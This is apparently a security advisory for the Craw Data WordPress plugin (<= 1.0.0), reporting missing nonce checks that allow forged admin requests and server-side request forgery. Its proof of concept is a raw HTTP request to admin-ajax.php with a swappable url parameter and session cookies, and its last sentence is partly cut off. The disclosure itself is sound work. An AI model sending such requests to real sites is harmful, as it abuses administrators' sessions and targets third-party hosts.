Craw Data <= 1.0.0 - Server Side Request Forgery

The plugin does not implement nonce checks, which could allow attackers to make a logged in admin change the url value performing unwanted crawls on third-party sites (SSRF).

PoC

When configuring the CrawData addon, the request is as follows GET /wordpress/wp-admin/admin-ajax.php?url=http%3A%2F%2FTARGET.SITE%3Fpage1.html&action;=crawDataAjax HTTP/1.1 Host: vulnerable.site User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: text/plain, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://vulnerable.site/wordpress/wp-admin/admin.php?page=ot-page X-Requested-With: XMLHttpRequest Connection: close Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=dn%7C1653675200%7CvLuUw1iVb1C4dE16OPdeTTKf0KtD6Uo8ZW65rn3VQAA%7Ccbcd17b27ea9476f321e86fda7ecef8f5933ebd3f4305f2404dd4c8974b66faa; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=dn%7C1653675200%7CvLuUw1iVb1C4dE16OPdeTTKf0KtD6Uo8ZW65rn3VQAA%7C622f3fd0b44a0ad5a74e24bab674c000ef47739fc78c7c496e20f786013b9424; wp-settings-time-1=1653502574 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin - Replacing the http%3A%2F%2Fdnoscp.com%3Fpage1.html with http%3A%2F%2F successfully makes the request as the Wordpress instance - SSRF Identified